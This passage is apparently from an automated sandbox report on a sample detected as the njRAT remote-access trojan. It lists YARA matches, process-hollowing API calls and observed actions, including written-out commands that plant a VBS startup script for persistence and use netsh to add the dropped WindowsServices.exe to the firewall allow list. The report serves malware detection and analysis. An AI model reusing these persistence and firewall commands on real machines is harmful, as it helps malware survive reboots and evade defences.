        Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000005.00000002.1429390738.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000015.00000002.1809054876.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000019.00000001.1855089629.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000019.00000002.1917172495.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000004.00000001.1338787516.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000004.00000002.1423595922.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000008.00000001.1426610906.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000016.00000002.1875231931.0000000002150000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000011.00000002.1749146703.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000008.00000001.1426610906.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000011.00000001.1677403153.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000015.00000001.1739321784.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000011.00000001.1677403153.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 00000015.00000002.1809054876.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
        Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
        Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
        Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
        Source: 0000000E.00000002.1684106540.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
        Source: WindowsServices.exe.4.dr, caspol.cs	Security API names: mutex.SetAccessControl
        Source: WindowsServices.exe.4.dr, caspol.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: WindowsServices.exe.4.dr, caspol.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: WindowsServices.exe.4.dr, caspol.cs	Security API names: accessControl.AddAccessRule
        Source: WindowsServices.exe.4.dr, caspol.cs	Security API names: mutex.GetAccessControl
        Source: iR2UtZj5vP.exe.1.dr, caspol.cs	Security API names: mutex.SetAccessControl
        Source: iR2UtZj5vP.exe.1.dr, caspol.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
        Source: iR2UtZj5vP.exe.1.dr, caspol.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
        Source: iR2UtZj5vP.exe.1.dr, caspol.cs	Security API names: accessControl.AddAccessRule
        Source: iR2UtZj5vP.exe.1.dr, caspol.cs	Security API names: mutex.GetAccessControl
        Source: classification engine	Classification label: mal100.phis.troj.adwa.spyw.expl.evad.winEXE@35/9@4/3
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	Code function: 4_2_00B8A8CA AdjustTokenPrivileges,4_2_00B8A8CA
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	Code function: 4_2_00B8A893 AdjustTokenPrivileges,4_2_00B8A893
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 17_2_00B3A8CA AdjustTokenPrivileges,17_2_00B3A8CA
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 17_2_00B3A893 AdjustTokenPrivileges,17_2_00B3A893
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 21_2_00D7A8CA AdjustTokenPrivileges,21_2_00D7A8CA
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 21_2_00D7A893 AdjustTokenPrivileges,21_2_00D7A893
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 25_2_00E8A8CA AdjustTokenPrivileges,25_2_00E8A8CA
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Code function: 25_2_00E8A893 AdjustTokenPrivileges,25_2_00E8A893
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	Code function: 1_2_00405A10 LoadLibraryA,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleFileNameW,wcscpy,wcscpy,wcscat,wcscat,wcscpy,wcscat,wcscat,CreateProcessW,Wow64GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,NtUnmapViewOfSection,VirtualAllocEx,VirtualAllocEx,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,Wow64SetThreadContext,WriteProcessMemory,ResumeThread,Wow64SuspendThread,WriteProcessMemory,wcscpy,wcscat,MoveFileExW,CopyFileW,ResumeThread,Sleep,CreateToolhelp32Snapshot,Module32First,strstr,Wow64SuspendThread,Wow64SuspendThread,FindCloseChangeNotification,DeleteFileW,ResumeThread,Sleep,DeleteFileW,Wow64SuspendThread,Sleep,MoveFileExW,ResumeThread,wcscat,wcsstr,CreateFileW,TerminateProcess,strstr,CreateFileW,CreateFileW,CreateFileW,CreateFileW,FindCloseChangeNotification,CreateToolhelp32Snapshot,Process32First,Process32Next,strstr,strstr,FindCloseChangeNotification,CreateFileA,CreateFileA,CreateFileW,wcslen,CreateFileW,wcscat,CreateFileW,VirtualAlloc,ReadFile,FindCloseChangeNotification,VirtualAlloc,CreateProcessA,Sleep,TerminateProcess,1_2_00405A10
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	File created: C:\Users\user\Desktop\iR2UtZj5vP.exe
        Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7272:120:WilError_03
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7980:120:WilError_03
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Mutant created: \Sessions\1\BaseNamedObjects\bf497657d005804b657fde8dd2d0cb46
        Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3284:120:WilError_03
        Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:736:120:WilError_03
        Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8188:120:WilError_03
        Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8032:120:WilError_03
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	File created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\iR2UtZj5vP.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: iR2UtZj5vP.exe	ReversingLabs: Detection: 86%
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	File read: C:\Users\user\Desktop\iR2UtZj5vP.exe
        Source: unknown	Process created: C:\Users\user\Desktop\iR2UtZj5vP.exe C:\Users\user\Desktop\iR2UtZj5vP.exe
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\iR2UtZj5vP.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	Process created: C:\Users\user\Desktop\iR2UtZj5vP.exe C:\Users\user\Desktop\iR2UtZj5vP.exe
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe"
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: unknown	Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh firewall add allowedprogram "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" "WindowsServices.exe" ENABLE
        Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe C:\Users\user\AppData\Local\Temp\WindowsServices.exe
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\Desktop\iR2UtZj5vP.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	Process created: C:\Users\user\Desktop\iR2UtZj5vP.exe C:\Users\user\Desktop\iR2UtZj5vP.exe
        Source: C:\Users\user\Desktop\iR2UtZj5vP.exe	Process created: C:\Users\user\AppData\Local\Temp\WindowsServices.exe "C:\Users\user\AppData\Local\Temp\WindowsServices.exe"
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo on error resume next:CreateObject("WScript.Shell").Run "C:\Users\user\AppData\Local\Temp\WindowsServices.exe",1: >"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs"
